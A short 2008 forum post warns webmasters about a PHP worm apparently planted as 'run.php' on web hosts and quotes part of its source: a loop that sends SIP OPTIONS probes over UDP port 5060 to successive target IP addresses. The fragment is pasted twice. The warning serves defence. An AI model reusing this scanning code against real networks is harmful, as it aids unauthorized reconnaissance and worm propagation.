PHP Worm Virus
Posted: Sun Nov 02, 2008 9:26 am
A friend from the Netherlands who normally does Wordpress stuff sent me the source code to a worm virus that he received. This thing is very dangerous in what damage it could do, or what it could download or do on your website and other parts of the web. Please be on the lookout for a "run.php" file that may or may not be this thing on any of your web hosts. Just thought I'd suggest this to you.
Some parts of the file were:
$curip = $targets[$curtarget][0] + $targetid;
$curip = mylong2ip($curip);
$out = "OPTIONS sip:$curip SIP/2.0\r\n";
$out .= "Via: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4bK-3408002827;rport\r\n";
$out .= "Content-Length: 0\r\n";
$out .= "From: \"siplicious\"<sip:100@1.1.1.1>; tag=0101010113c4\r\n";
$out .= "Accept: application/sdp\r\n";
$out .= "To: \"siplicious\"<sip:100@1.1.1.1>\r\n";
$out .= "Contact: sip:None@127.0.1.1:5060\r\n";
$out .= "CSeq: 1 OPTIONS\r\n";
$out .= "Call-ID: 700556890817406150532338\r\n";
$out .= "Max-Forwards: 70\r\n";
$out .= "\r\n";
socket_sendto($sock, $out, strlen($out), 0, $curip, 5060);
Some parts of the file were:
$curip = $targets[$curtarget][0] + $targetid;
$curip = mylong2ip($curip);
$out = "OPTIONS sip:$curip SIP/2.0\r\n";
$out .= "Via: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4bK-3408002827;rport\r\n";
$out .= "Content-Length: 0\r\n";
$out .= "From: \"siplicious\"<sip:100@1.1.1.1>; tag=0101010113c4\r\n";
$out .= "Accept: application/sdp\r\n";
$out .= "To: \"siplicious\"<sip:100@1.1.1.1>\r\n";
$out .= "Contact: sip:None@127.0.1.1:5060\r\n";
$out .= "CSeq: 1 OPTIONS\r\n";
$out .= "Call-ID: 700556890817406150532338\r\n";
$out .= "Max-Forwards: 70\r\n";
$out .= "\r\n";
socket_sendto($sock, $out, strlen($out), 0, $curip, 5060);